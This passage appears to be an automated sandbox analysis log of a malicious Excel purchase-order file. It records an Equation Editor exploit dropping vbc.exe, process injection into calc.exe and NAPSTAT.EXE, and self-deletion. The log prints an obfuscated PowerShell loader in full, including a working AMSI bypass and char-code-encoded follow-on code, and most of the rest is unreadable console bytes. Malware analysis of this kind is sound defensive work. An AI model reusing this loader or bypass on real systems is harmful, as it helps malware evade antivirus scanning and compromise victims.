          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v...._...............da.j....@FP..............._.............}..v....0.'.....0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v...._................a.j......'..............._.............}..v....h.'.....0................CP.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....k...............da.j....@FP..............._.............}..v....0.'.....0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....k................a.j......'..............._.............}..v....h.'.....0................CP.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....w...............da.j....@FP..............._.............}..v....0.'.....0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....w................a.j......'..............._.............}..v....h.'.....0................CP.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................da.j....@FP..............._.............}..v....0.'.....0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.....................a.j......'..............._.............}..v....h.'.....0................CP.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................da.j....@FP..............._.............}..v....0.'.....0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.....................a.j......'..............._.............}..v....h.'.....0................CP.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................da.j....@FP..............._.............}..v....0.'.....0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.....................a.j......'..............._.............}..v....h.'.....0................CP.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................da.j....@FP..............._.............}..v....0.'.....0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.....................a.j......'..............._.............}..v....h.'.....0................CP.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................da.j....@FP..............._.............}..v....0.'.....0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.....................a.j......'..............._.............}..v....h.'.....0................CP.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................da.j....@FP..............._.............}..v....0.'.....0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.....................a.j......'..............._.............}..v....h.'.....0................CP.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................da.j....@FP..............._.............}..v....0.'.....0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.....................a.j......'..............._.............}..v....h.'.....0................CP.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................da.j....@FP..............._.............}..v....0.'.....0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.....................a.j......'..............._.............}..v....h.'.....0................CP.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................da.j....@FP..............._.............}..v......'.....0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.....................a.j......'..............._.............}..v......'.....0................CP.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .................BO............................. ................._...............................N.............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.....................a.j....h.'..............._.............}..v......'.....0................CP.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................da.j....@FP..............._.............}..v....8.'.....0.......................r.......................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.....................a.j......'..............._.............}..v....p.'.....0................CP.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v............ .......da.j....@FP..............._.............}..v......'.....0................BP.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.....................a.j......'..............._.............}..v....8.'.....0................CP.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v............{.2.7.8.1.7.6.1.E.-.2.8.E.0.-.4.1.0.9.-.9.9.F.E.-.B.9.D.1.2.7.C.5.7.A.F.E.}.....H.P.....L.......................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......P..............._.............}..v....X.......0.................P.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v..../.......{.2.7.8.1.7.6.1.E.-.2.8.E.0.-.4.1.0.9.-.9.9.F.E.-.B.9.D.1.2.7.C.5.7.A.F.E.}.....H.P.....L.......................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v..../..................j......P..............._.............}..v.....H......0.................P.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....C..................j......P..............._.............}..v....(.$.....0.......................j.......................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....C..................j......$..............._.............}..v....`.$.....0...............(.P.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....O.......A.t. .l.i.n.e.:.4. .c.h.a.r.:.1.7._.............}..v....p.$.....0.................P.....".......................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....O..................j....(.$..............._.............}..v......$.....0...............(.P.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....[..................j......P..............._.............}..v......$.....0.......................^.......................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....[..................j......$..............._.............}..v......%.....0...............(.P.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....g..................j......P..............._.............}..v......%.....0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....g..................j......%..............._.............}..v......%.....0...............(.P.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....s....... . . .x.c.e.p.t.i.o.n............._.............}..v......%.....0.................P.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....s..................j....X.%..............._.............}..v......%.....0...............(.P.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......P..............._.............}..v......%.....0.......................`.......................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......%..............._.............}..v....8.%.....0...............(.P.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v............ ..........j......P..............._.............}..v......%.....0.................P.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......%..............._.............}..v......%.....0...............(.P.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......P..............._.............}..v....8.+.....0.......................j.......................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......+..............._.............}..v....p.+.....0...............(.P.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v............A.t. .l.i.n.e.:.5. .c.h.a.r.:.1.2._.............}..v..... +.....0.................P.....".......................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j....8!+..............._.............}..v.....!+.....0...............(.P.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......P..............._.............}..v.....(+.....0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j....8)+..............._.............}..v.....)+.....0...............(.P.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......P..............._.............}..v.....0+.....0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j....81+..............._.............}..v.....1+.....0...............(.P.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......P..............._.............}..v.....8+.....0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j....89+..............._.............}..v.....9+.....0...............(.P.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v............8.E.0.-.4.1.0.9.-.9.9.F.E.-.B.9.D.1.2.7.C.5.7.A.F.E.}.'.;.+.....0.................P.....:.......................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j.....>+..............._.............}..v....0?+.....0...............(.P.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......P..............._.............}..v.....E+.....0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j.....F+..............._.............}..v....0G+.....0...............(.P.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v............ . . .x.c.e.p.t.i.o.n............._.............}..v.....J+.....0.................P.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j.....K+..............._.............}..v.....L+.....0...............(.P.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......P..............._.............}..v....(Q+.....0.......................`.......................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j.....Q+..............._.............}..v....`R+.....0...............(.P.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v............ ..........j......P..............._.............}..v.....U+.....0.................P.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j.....V+..............._.............}..v....(W+.....0...............(.P.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v............{.2.7.8.1.7.6.1.E.-.2.8.E.0.-.4.1.0.9.-.9.9.F.E.-.B.9.D.1.2.7.C.5.7.A.F.E.}.....H.P.....L.......................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......P..............._.............}..v......+.....0.................P.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....+.......{.2.7.8.1.7.6.1.E.-.2.8.E.0.-.4.1.0.9.-.9.9.F.E.-.B.9.D.1.2.7.C.5.7.A.F.E.}.....H.P.....L.......................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....+..................j......P..............._.............}..v....8.+.....0.................P.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....;.......{.2.7.8.1.7.6.1.E.-.2.8.E.0.-.4.1.0.9.-.9.9.F.E.-.B.9.D.1.2.7.C.5.7.A.F.E.}.....H.P.....L.......................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....;..................j......P..............._.............}..v....`O,.....0.................P.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....K.......{.2.7.8.1.7.6.1.E.-.2.8.E.0.-.4.1.0.9.-.9.9.F.E.-.B.9.D.1.2.7.C.5.7.A.F.E.}.....H.P.....L.......................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....K..................j......P..............._.............}..v......,.....0.................P.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....[..................j......P..............._.............}..v......,.....0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....[...............T..j......P..............._.............}..v....(.,.....0.................P.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....k..................j......P..............._.............}..v....(F-.....0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....k...............T..j......P..............._.............}..v.....G-.....0.................P.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....{..................j......P..............._.............}..v......-.....0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....{...............T..j......P..............._.............}..v....h.-.....0.................P.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......P..............._.............}..v....h.-.....0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................T..j......P..............._.............}..v......-.....0.................P.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......................_.............}..v.....J......0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................T..j......P..............._.............}..v.....K......0.................P.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......P..............._.............}..v............0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................T..j......P..............._.............}..v....H.......0.................P.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......P..............._.............}..v....H.......0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................T..j......P..............._.............}..v............0.................P.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......P..............._.............}..v.....A/.....0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................T..j......P..............._.............}..v.....C/.....0.................P.............................
          Source: C:\Windows\SysWOW64\cmd.exeConsole Write: ................................C.:.\.W.I.N.D.O.W.S.\.s.y.s.w.o.w.6.4.\.c.a.l.c...e.x.e.................................<.........=.......=.....
          Source: C:\Windows\SysWOW64\cmd.exeConsole Write: ......................=.........A.c.c.e.s.s. .i.s. .d.e.n.i.e.d.........P$Ys....0.........=.............................&.................=.....
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.ini
          Source: C:\Users\Public\vbc.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hosts
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hosts
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hosts
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hosts
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hosts
          Source: PO20210722.xlsxVirustotal: Detection: 28%
          Source: PO20210722.xlsxReversingLabs: Detection: 28%
          Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
          Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
          Source: C:\Users\Public\vbc.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell $8B0111F552=[Ref].Assembly.GetType('Sy'+'stem.'+'Mana'+'gem'+'ent'+'.Autom'+'atio'+'n.A'+'m'+'si'+'Utils');$835FFE1926='4456625220575263174452554847';$9FE0AD5C66=[string](0..13|%{[char][int](53+($835FFE1926).substring(($_*2),2))})-replace ' ';$58FB808063=$8B0111F552.GetField($9FE0AD5C66,'Non^^^'.replace('^^^','Pub')+'lic,S'+'tatic');$58FB808063.SetValue($null,$true);($A72F9B815A=$A72F9B815A=Write-Host 'EC4AAB5808223EB722F9C2063ED056665AA80AC5658F9D06815720759C3EB4C4B7065724C3DEFA63DEB58FC3FA9D22121674');$676544567888888888876545666778=@(91,82,101,102,93,46,65,115,115,101,109,98,108,121,46,71,101,116,84,121,112,101,40,39,83,121,39,43,39,115,116,101,109,46,39,43,39,77,97,110,97,39,43,39,103,101,109,39,43,39,101,110,116,39,43,39,46,65,117,116,111,109,39,43,39,97,116,105,111,39,43,39,110,46,39,43,36,40,91,67,72,65,114,93,40,57,56,45,51,51,41,43,91,99,72,65,114,93,40,49,50,52,45,49,53,41,43,91,99,104,65,82,93,40,49,49,53,41,43,91,67,72,97,82,93,40,91,66,89,116,101,93,48,120,54,57,41,41,43,39,85,116,105,108,115,39,41,46,71,101,116,70,105,101,108,100,40,36,40,91,67,104,65,114,93,40,91,98,121,116,101,93,48,120,54,49,41,43,91,99,104,97,82,93,40,91,98,89,116,69,93,48,120,54,68,41,43,91,99,104,97,114,93,40,91,98,121,84,101,93,48,120,55,51,41,43,91,99,104,65,114,93,40,49,49,48,45,53,41,43,91,99,104,65,82,93,40,91,66,89,84,69,93,48,120,52,57,41,43,91,99,72,97,82,93,40,57,54,56,48,47,56,56,41,43,91,99,72,97,82,93,40,49,48,53,41,43,91,67,104,97,114,93,40,91,98,89,116,101,93,48,120,55,52,41,43,91,67,104,97,114,93,40,91,66,89,84,69,93,48,120,52,54,41,43,91,99,104,97,114,93,40,49,52,56,45,53,49,41,43,91,99,72,65,82,93,40,57,53,53,53,47,57,49,41,43,91,67,104,65,82,93,40,49,48,56,41,43,91,67,104,65,114,93,40,54,50,54,50,47,54,50,41,43,91,67,104,65,82,93,40,91,98,89,84,69,93,48,120,54,52,41,41,44,39,78,111,110,80,117,98,108,105,99,44,83,116,97,116,105,99,39,41,4
6,83,101,116,86,97,108,117,101,40,36,110,117,108,108,44,36,116,114,117,101,41,59,40,36,68,48,48,70,57,70,49,85,67,54,61,36,68,48,48,70,57,70,49,85,67,54,61,87,114,105,116,101,45,72,111,115,116,32,39,68,48,48,70,57,70,49,85,67,54,48,53,48,69,69,57,53,69,53,67,66,48,50,65,53,50,65,48,56,49,56,51,48,54,50,65,54,70,65,65,65,68,48,48,70,57,70,49,85,67,54,48,53,48,69,69,57,53,69,53,67,66,48,50,65,53,50,65,48,56,49,56,51,48,54,50,65,54,70,65,65,65,68,48,48,70,57,70,49,85,67,54,48,53,48,69,69,57,53,69,39,41,59,100,111,32,123,36,112,105,110,103,32,61,32,116,101,115,116,45,99,111,110,110,101,99,116,105,111,110,32,45,99,111,109,112,32,103,111,111,103,108,101,46,99,111,109,32,45,99,111,117,110,116,32,49,32,45,81,117,105,101,116,125,32,117,110,116,105,108,32,40,36,112,105,110,103,41,59,36,66,48,50,65,53,50,65,48,56,49,32,61,32,91,69,110,117,109,93,58,58,84,111,79,98,106,101,99,116,40,91,83,121,115,116,101,109,46,78,101,116,46,83,101,99,117,114,105,116,121,80,114,111,116,111,99,111,108,84,121,112,101,93,44,32,51,48,55,50,41,59,91,83,121,115,116,101,109,46,
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\calc.exe {path}
          Source: C:\Windows\SysWOW64\calc.exeProcess created: C:\Windows\SysWOW64\NAPSTAT.EXE C:\Windows\SysWOW64\NAPSTAT.EXE
          Source: C:\Windows\SysWOW64\NAPSTAT.EXEProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\WINDOWS\syswow64\calc.exe'
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
          Source: C:\Users\Public\vbc.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell $8B0111F552=[Ref].Assembly.GetType('Sy'+'stem.'+'Mana'+'gem'+'ent'+'.Autom'+'atio'+'n.A'+'m'+'si'+'Utils');$835FFE1926='4456625220575263174452554847';$9FE0AD5C66=[string](0..13|%{[char][int](53+($835FFE1926).substring(($_*2),2))})-replace ' ';$58FB808063=$8B0111F552.GetField($9FE0AD5C66,'Non^^^'.replace('^^^','Pub')+'lic,S'+'tatic');$58FB808063.SetValue($null,$true);($A72F9B815A=$A72F9B815A=Write-Host 'EC4AAB5808223EB722F9C2063ED056665AA80AC5658F9D06815720759C3EB4C4B7065724C3DEFA63DEB58FC3FA9D22121674');$676544567888888888876545666778=@(91,82,101,102,93,46,65,115,115,101,109,98,108,121,46,71,101,116,84,121,112,101,40,39,83,121,39,43,39,115,116,101,109,46,39,43,39,77,97,110,97,39,43,39,103,101,109,39,43,39,101,110,116,39,43,39,46,65,117,116,111,109,39,43,39,97,116,105,111,39,43,39,110,46,39,43,36,40,91,67,72,65,114,93,40,57,56,45,51,51,41,43,91,99,72,65,114,93,40,49,50,52,45,49,53,41,43,91,99,104,65,82,93,40,49,49,53,41,43,91,67,72,97,82,93,40,91,66,89,116,101,93,48,120,54,57,41,41,43,39,85,116,105,108,115,39,41,46,71,101,116,70,105,101,108,100,40,36,40,91,67,104,65,114,93,40,91,98,121,116,101,93,48,120,54,49,41,43,91,99,104,97,82,93,40,91,98,89,116,69,93,48,120,54,68,41,43,91,99,104,97,114,93,40,91,98,121,84,101,93,48,120,55,51,41,43,91,99,104,65,114,93,40,49,49,48,45,53,41,43,91,99,104,65,82,93,40,91,66,89,84,69,93,48,120,52,57,41,43,91,99,72,97,82,93,40,57,54,56,48,47,56,56,41,43,91,99,72,97,82,93,40,49,48,53,41,43,91,67,104,97,114,93,40,91,98,89,116,101,93,48,120,55,52,41,43,91,67,104,97,114,93,40,91,66,89,84,69,93,48,120,52,54,41,43,91,99,104,97,114,93,40,49,52,56,45,53,49,41,43,91,99,72,65,82,93,40,57,53,53,53,47,57,49,41,43,91,67,104,65,82,93,40,49,48,56,41,43,91,67,104,65,114,93,40,54,50,54,50,47,54,50,41,43,91,67,104,65,82,93,40,91,98,89,84,69,93,48,120,54,52,41,41,44,39,78,111,110,80,117,98,108,105,99,44,83,116,97,116,105,99,39,41,4
6,83,101,116,86,97,108,117,101,40,36,110,117,108,108,44,36,116,114,117,101,41,59,40,36,68,48,48,70,57,70,49,85,67,54,61,36,68,48,48,70,57,70,49,85,67,54,61,87,114,105,116,101,45,72,111,115,116,32,39,68,48,48,70,57,70,49,85,67,54,48,53,48,69,69,57,53,69,53,67,66,48,50,65,53,50,65,48,56,49,56,51,48,54,50,65,54,70,65,65,65,68,48,48,70,57,70,49,85,67,54,48,53,48,69,69,57,53,69,53,67,66,48,50,65,53,50,65,48,56,49,56,51,48,54,50,65,54,70,65,65,65,68,48,48,70,57,70,49,85,67,54,48,53,48,69,69,57,53,69,39,41,59,100,111,32,123,36,112,105,110,103,32,61,32,116,101,115,116,45,99,111,110,110,101,99,116,105,111,110,32,45,99,111,109,112,32,103,111,111,103,108,101,46,99,111,109,32,45,99,111,117,110,116,32,49,32,45,81,117,105,101,116,125,32,117,110,116,105,108,32,40,36,112,105,110,103,41,59,36,66,48,50,65,53,50,65,48,56,49,32,61,32,91,69,110,117,109,93,58,58,84,111,79,98,106,101,99,116,40,91,83,121,115,116,101,109,46,78,101,116,46,83,101,99,117,114,105,116,121,80,114,111,116,111,99,111,108,84,121,112,101,93,44,32,51,48,55,50,41,59,91,83,121,115,116,101,109,46,
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\calc.exe {path}
          Source: C:\Windows\SysWOW64\calc.exeProcess created: C:\Windows\SysWOW64\NAPSTAT.EXE C:\Windows\SysWOW64\NAPSTAT.EXE
          Source: C:\Windows\SysWOW64\NAPSTAT.EXEProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\WINDOWS\syswow64\calc.exe'
          Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C90250F3-4D7D-4991-9B69-A5C5BC1C2AE6}\InProcServer32
          Source: Window RecorderWindow detected: More than 3 window changes detected
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorrc.dll
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
          Source: PO20210722.xlsxStatic file information: File size 1296896 > 1048576
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
          Source: Binary string: wntdll.pdb source: calc.exe, NAPSTAT.EXE
          Source: Binary string: napstat.pdb source: calc.exe, 0000000B.00000002.2269767353.00000000007BF000.00000004.00000001.sdmp
          Source: PO20210722.xlsxInitial sample: OLE indicators vbamacros = False
          Source: PO20210722.xlsxInitial sample: OLE indicators encrypted = True

          Data Obfuscation:

          Obfuscated command line found
          Source: C:\Users\Public\vbc.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell $8B0111F552=[Ref].Assembly.GetType('Sy'+'stem.'+'Mana'+'gem'+'ent'+'.Autom'+'atio'+'n.A'+'m'+'si'+'Utils');$835FFE1926='4456625220575263174452554847';$9FE0AD5C66=[string](0..13|%{[char][int](53+($835FFE1926).substring(($_*2),2))})-replace ' ';$58FB808063=$8B0111F552.GetField($9FE0AD5C66,'Non^^^'.replace('^^^','Pub')+'lic,S'+'tatic');$58FB808063.SetValue($null,$true);($A72F9B815A=$A72F9B815A=Write-Host 'EC4AAB5808223EB722F9C2063ED056665AA80AC5658F9D06815720759C3EB4C4B7065724C3DEFA63DEB58FC3FA9D22121674');$676544567888888888876545666778=@(91,82,101,102,93,46,65,115,115,101,109,98,108,121,46,71,101,116,84,121,112,101,40,39,83,121,39,43,39,115,116,101,109,46,39,43,39,77,97,110,97,39,43,39,103,101,109,39,43,39,101,110,116,39,43,39,46,65,117,116,111,109,39,43,39,97,116,105,111,39,43,39,110,46,39,43,36,40,91,67,72,65,114,93,40,57,56,45,51,51,41,43,91,99,72,65,114,93,40,49,50,52,45,49,53,41,43,91,99,104,65,82,93,40,49,49,53,41,43,91,67,72,97,82,93,40,91,66,89,116,101,93,48,120,54,57,41,41,43,39,85,116,105,108,115,39,41,46,71,101,116,70,105,101,108,100,40,36,40,91,67,104,65,114,93,40,91,98,121,116,101,93,48,120,54,49,41,43,91,99,104,97,82,93,40,91,98,89,116,69,93,48,120,54,68,41,43,91,99,104,97,114,93,40,91,98,121,84,101,93,48,120,55,51,41,43,91,99,104,65,114,93,40,49,49,48,45,53,41,43,91,99,104,65,82,93,40,91,66,89,84,69,93,48,120,52,57,41,43,91,99,72,97,82,93,40,57,54,56,48,47,56,56,41,43,91,99,72,97,82,93,40,49,48,53,41,43,91,67,104,97,114,93,40,91,98,89,116,101,93,48,120,55,52,41,43,91,67,104,97,114,93,40,91,66,89,84,69,93,48,120,52,54,41,43,91,99,104,97,114,93,40,49,52,56,45,53,49,41,43,91,99,72,65,82,93,40,57,53,53,53,47,57,49,41,43,91,67,104,65,82,93,40,49,48,56,41,43,91,67,104,65,114,93,40,54,50,54,50,47,54,50,41,43,91,67,104,65,82,93,40,91,98,89,84,69,93,48,120,54,52,41,41,44,39,78,111,110,80,117,98,108,105,99,44,83,116,97,116,105,99,39,41,4
